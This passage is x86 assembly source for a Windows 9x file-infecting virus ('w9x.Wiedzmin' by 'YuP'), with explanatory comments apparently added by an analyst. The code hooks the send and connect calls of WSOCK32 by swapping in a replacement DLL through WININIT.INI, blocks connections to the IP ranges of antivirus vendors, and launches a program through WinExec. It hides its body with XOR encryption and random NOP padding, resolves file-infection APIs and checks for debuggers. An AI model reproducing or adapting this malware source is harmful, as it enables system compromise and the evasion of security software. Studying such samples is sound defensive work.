lea edi,[ecx+offset inf_prog2]
_cat:                                 ; inf_prog2 = santa
lodsb
cmp al,0
je _catt
stosb
jmp _cat

_catt:
mov al,' '                            ; inf_prog2 += " "
stosb

lea esi,[ecx+offset inf_prog]
_make_real:                           ; inf_prog2 += inf_prog
lodsb
cmp al,0
je done
stosb
jmp _make_real

done:
mov edi,ecx                           ; EDI = delta

push 1                                ; uCmdShow = SW_SHOWNORMAL
lea eax,[edi+offset inf_prog2]
push eax                              ; lpCmdLine
call dword ptr [edi+wex]              ; presumably WinExec (two stdcall args)

jmp TOS


reset_err:    push WSAECONNRESET      ; not referenced in this view
              call dword ptr [edi+_WSASetLastError]
              popad 
              push -1
              pop eax
              jmp out_s
;/*END-------------------------------------------------------------------------------------------
;Returns EAX = (runtime address of @hookerdelta) - (assembled offset of
;@hookerdelta), i.e. the relocation delta of the hook blob, used by both
;hooks to address their data.
get_delta:
call @hookerdelta
@hookerdelta:
pop eax                             
sub eax,offset @hookerdelta         
ret


;Data of the hook blob (addressed as [delta+symbol] by the hooks).
my_data: 
a_send dd 0                          ; original send, called by hooked_send
a_connect dd 0                       ; original connect, called by hooked_connect

msgg dd 0BFF44146h                   ; hard-coded constant, not referenced in this view

;Import slots used by the hooks; filled in outside this view.
DO_WPISU: _WSASetLastError dd 0
          wex              dd 0      ; called with (cmdline, 1) -> presumably WinExec
          gcd              dd 0      ; GetCurrentDirectoryA (see hooked_send)


WSAHOST_NOT_FOUND       equ     11001
WSAECONNRESET           equ     10054 


buff        db 110 dup (0)           ; file name taken from the STOR line
inf_prog2   db 260 dup (0)           ; command line built for wex
inf_prog    db 260 dup (0)           ; current directory + "\" + buff
santa      db 'C:\Program Files\deithwen.exe',0
;santa       db 'C:\WINDOWS\CALC.EXE',0

;***********DENIED LIST*************************************************************************
;thx goez to T-2000/Immortal Riot ;]
;Three bytes per entry: the first three octets of an address block.
;hooked_connect compares them against the first three octets of every
;connect() destination; the 0,0,0 entry terminates the scan.

DENIED:         DB      161,069,003         ; nai.com
                DB      216,122,008         ; avp.com
                DB      195,170,248         ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru
                DB      193,247,150         ; avp.ch, metro.ch
                DB      194,252,006         ; datafellows.com, f-secure.com
                DB      195,112,025         ; drsolomon.com
                DB      208,228,231         ; mcafee.com
                DB      194,203,134         ; sophos.com
                DB      146,145,148         ; norman.com
                DB      206,204,003         ; pandasoftware.com
                DB      193,004,210         ; complex.is
                DB      203,037,250         ; leprechaun.com.au
                DB      141,202,248         ; cai.com
                DB      216,033,022         ; antivirus.com, trendmicro.com
                DB      216,035,137         ; sarc.com
                DB      216,086,104         ; virus.com
                DB      212,029,228         ; invircible.com
                DB      208,226,167         ; symantec.com
                DB      207,227,040         ; grisoft.com
                DB      194,105,193         ; drweb.ru
                DB      000,000,000         ; end of table.

hook_end label byte                  ; end of the blob that starts at start_h
;________________________________________________________________________________________________
;============================================================================================DATA
;________________________________________________________________________________________________

;**APIZ TO HOOK**
;Export names that hooked_send / hooked_connect replace (with lengths).
A1 db 'send',0
A1s equ $-A1
A2 db 'connect',0
A2s equ $-A2




e_esi   dd 0

APIS db 'GetProcAddress',0
APIS_SIZE = $ - APIS


;Names resolved into APIListA (same order). The list is closed by 07h,
;the stop byte of @CRYPT_BYTEZ/@UN_CRYPT_BYTEZ. SetFileAttributesA is
;listed twice, matching the two slots _SetAttributesA/_SetFileAttributesA.
APIList:     db "FindFirstFileA",0
             db "FindNextFileA",0
             db "FindClose",0
             db "SetFileAttributesA",0
             db "SetFileTime",0
             db "CreateFileA",0
             db "CreateFileMappingA",0
             db "MapViewOfFile",0
             db "UnmapViewOfFile",0
             db "GetFileTime",0
             db "GetFileSize",0
             db "GetFileAttributesA",0
             db "SetFileAttributesA",0
             db "ReadFile",0
             db "WriteFile",0
             db "SetFilePointer",0
             db "SetEndOfFile",0
             db "CloseHandle",0        
             db "SetCurrentDirectoryA",0 
             db "GetWindowsDirectoryA",0
             db "GetSystemDirectoryA",0
             db "CopyFileA",0
             db "ExitProcess",0
             db "GetTickCount",0
             db "GetCommandLineA",0
             db "IsDebuggerPresent",0
             db "OutputDebugStringA",0
             db "WinExec",0
             db "LoadLibraryA",0
             db "GetModuleHandleA",0
             db "Sleep",0
             db "GetSystemTime",0
             db "WritePrivateProfileStringA",0
             db "VirtualAlloc",0
             db "VirtualFree",0
             db "GetCurrentDirectoryA",0,07h  ;07h stops the looking up
             
msg dd 0BFF44146h                    ; hard-coded constant; not referenced in this view

key        dd 0                      ; byte-add key written by @GGEN_KEY, read by @UN_CRYPT_BYTEZ

;shit7 db "w.dll",0

marker db 'sru.exe',0                ; the commented-out '*.exe' alternative suggests a test build
;marker db '*.exe',0



;Strings handled by @CRYPT_BYTEZ/@UN_CRYPT_BYTEZ (the run ends with the
;07h after deshit). Payload text, file names used by @wsockz, the
;WININIT.INI section/file names, and the font/caption strings.
TO_CRYPT_DATA:  to_ja:      db 0ah,0dh
                            db "",0ah,0dh
                            db "<w9x.Wiedzmin (c) -  YuP  - Welcome to new school>",0ah,0dh
                            db "ĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽ",0ah,0dh
                            db "Ć Deithwen Addan Flared Again",0ah,0dh
                            db "Ć You have eyez, but u can't see",0ah,0dh
                            db "Ć You have earz, but u can't hear",0ah,0dh
                            db "Ć Wake up from unreal world before",0ah,0dh
                            db "Ć you drown in the Sea of Chaos.",0ah,0dh
                            db "",0ah,0dh
                            db "ĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽ",0ah,0dh
                            db 0ah,0dh,0
                 wsock      db "\WSOCK32.dll",0          ; appended to sysDIR in @wsockz
                 nowe       db "\WZZOCK32.dll",0         ; appended to winDIRr in @wsockz
                 sice9x     db "\\.\SICE",0              ; SoftICE device name; its use is not in this view
                 sle        db "WSASetLastError",0
                 user32     db "USER32.DLL",0
                  gdi32     db "GDI32.DLL",0
                 WININIT    db "WININIT.INI",0           ; [rename] target file in @wsockz
                   rename   db "rename",0                ; section name written by @wsockz
                      jed   db "X",0
                      famil db "Verdana",0               ; presumably for _CreateFontA
                       logo db ": w9x.WiEDZMiN has you :",0
                deshit      db "kfe",0,07h               ; 07h ends the encoded run





;Writes the body into the target with a variable-length NOP run in front.
;ENTRY (as used here): EDI = destination, ESI = source, ECX = byte count
;for the rep movsb (ECX is saved around the NOP loop and then consumed
;by rep movsb).
;Steps: pad EDI with (GetTickCount remainder mod 255) NOPs; XOR-decode
;TO_DE bytes at @to_this with key_main (both symbols outside this view);
;copy the body; then call @main_decryptor with EDI = '!PUY' (bytes "YUP!").
;Analyst note: the NOP run shifts the body's offset from one infection to
;the next; the "YUP!" marker is a fixed constant.
@crypt_my_body:
push ecx
call dword ptr [ebp+_GetTickCount]
mov ebx,255
idiv ebx                             ; remainder in EDX
mov ecx,edx

@mutualisk:                          ; pad with NOPs
mov byte ptr [edi],90h
inc edi
loop @mutualisk
pop ecx

pushad
lea edx,[ebp+offset @to_this]
mov eax,[ebp+key_main]               ; key2 + key, see @combine_key
mov ecx,TO_DE

@loop_decryptt:
xor byte ptr [edx],al
inc edx
loop @loop_decryptt
@end_de: 
popad
rep movsb                            ; copy the body behind the NOPs
mov edi,'!PUY'
call @main_decryptor                 ; outside this view
ret



key_main dd 0                        ; XOR key for @crypt_my_body, set by @combine_key

;db 5 dup (90h)


      ; align   dword
VirusEnd label byte                  ; end of the replicated body

;==================================================FIND=========================================
;=============================================VirtualData does not go into the virus body=======
;Runtime-only data (between HeapStart and HeapEnd, after VirusEnd).

HeapStart label byte 
finddata WIN32_FIND_DATA <>   ;the find-data structure itself (cFileName is read by @bad_name, @wsockz)
fileHandle dd 0
fileAtrib               dd 0


licznik_b dd 0                       ; counter (name: "licznik" = counter)


;Resolved addresses, one slot per APIList name, same order.
APIListA:   _FindFirstFileA        dd 0
            _FindNextFileA         dd 0
            _FindClose             dd 0
            _SetAttributesA        dd 0
            _SetFileTime           dd 0
            _CreateFileA           dd 0
            _CreateFileMappingA    dd 0
            _MapViewOfFile         dd 0
            _UnmapViewOfFile       dd 0
            _GetFileTime           dd 0
            _GetFileSize           dd 0
            _GetFileAttributesA    dd 0
            _SetFileAttributesA    dd 0
            _ReadFile              dd 0
            _WriteFile             dd 0
            _SetFilePointer        dd 0
            _SetEndOfFile          dd 0 
            _CloseHandle           dd 0
            _SetCurrentDirectoryA  dd 0 
            _GetWindowsDirectoryA  dd 0
            _GetSystemDirectoryA   dd 0
            _CopyFileA             dd 0
            _ExitProcess           dd 0 
            _GetTickCount          dd 0
            _GetCommandLineA       dd 0
            _IsDebuggerPresent     dd 0
            _OutputDebugStringA    dd 0
            _WinExec               dd 0
            _LoadLibraryA          dd 0
            _GetModuleHandleA      dd 0
            _Sleep                 dd 0
            _GetSystemTime         dd 0
            _WritePrivateProfileStringA dd 0
            _VirtualAlloc          dd 0
            _VirtualFree           dd 0
            _GetCurrentDirectoryA  dd 0


;GDI/USER slots (the routines that fill and use them are not in this view).
@GDI_APIZA: _CreateFontA      dd 0
            _TextOutA         dd 0
            _SetBkMode        dd 0
            _SetTextColor     dd 0
            _SelectObject     dd 0
            _GetSystemMetrics dd 0
            _GetDesktopWindow dd 0
            _GetWindowDC      dd 0
            _ReleaseDC        dd 0


;SYSTEMTIME layout (eight WORDs).
SYSTEM_TIME:  wYear         dw 0 
              wMonth        dw 0  
              wDayOfWeek    dw 0   
              wDay          dw 0 
              wHour         dw 0 
              wMinute       dw 0 
              wSecond       dw 0 
              wMilliseconds dw 0 



F1: dd 2 dup (?)                     ; three 64-bit slots; presumably FILETIMEs for Get/SetFileTime
F2: dd 2 dup (?)
F3: dd 2 dup (?)

vbuf       dd 0
help_virus dd 0                      ; 1 -> entry section not .text/CODE -> @mute_other_virus
memory     dd 0
header     dd 0
align      dd 0
_hostIP    dd 0
_secAlign  dd 0
newEIP dd 0
NewEIP dd 0                          ; entry point written by @mute_other_virus
firstk dd 0                          ; selects the @GGEN_KEY branch
key2   dd 0                          ; second key from @GGEN_KEY

go_wsock  dd 0                       ; 1 while @infect runs on the WSOCK32 copy
wsock_h   dd 0                       ; mapping of the WSOCK32 copy
moj_address dd 0
capis       dd 0
wsock_hh    dd 0

NON dd 0                                              ;numbers of names
AOF dd 0                                              ;addr of Functions
AON dd 0                                              ;addr of Names
AOO dd 0                                              ;addr of Ordinals

IndexA dd 0
_GPA   dd 0                          ; GetProcAddress

fHnd                    dd  0        ; file handle of the current target
fHndMap                 dd  0        ; its mapping object
fMapReal                dd  0        ; base of the mapped view
fSize                   dd  0        ; its size

my_seh dd 0

was_win dd 0
ic dd 0
sHnd dd 0
shitsize dd 0


oldDIR                  db  512 dup (?)
winDIR                  db  260 dup (?)
sysDIR                  db  260 dup (?)  ; <sysdir>\WSOCK32.dll in @wsockz
winDIRr                 db  260 dup (?)  ; <windir>\WZZOCK32.dll in @wsockz
db 5 dup (?)




toHOST dd 0


      ; align dword 
HeapEnd label byte



;Message-box strings for the first-generation host (fakehost below);
;virussizee is not defined in this view (presumably a macro that emits
;the size as text).
titlee db "w9x.Wiedzmin by YuP - 1st Generation",0
bodyy  db "Elaine blath, Feainnewedd",0ah,0dh
       db "Dearme aen a'caelme tedd",0ah,0dh
       db "Eigean evelienn deireadh",0ah,0dh
       db "Que'n esse, va en esseath",0ah,0dh
       db "Feainnewedd, elaine blath!"
       db 0ah,0dh
       virussizee
       db      " bytes",0

;Stand-in host for the first generation: shows titlee/bodyy in a message
;box and exits. Uses absolute offsets (no EBP delta), so it is not part of
;the relocatable body that ends at VirusEnd.
fakehost:
push 0h                              ; uType
push offset titlee                   ; lpCaption
push offset bodyy                    ; lpText
push 0h                              ; hWnd
call MessageBoxA


push 0h                              ; uExitCode
call ExitProcess


endshit: ends                        ; closes the segment opened outside this view


End  v_start                         ; program entry label v_start is defined outside this view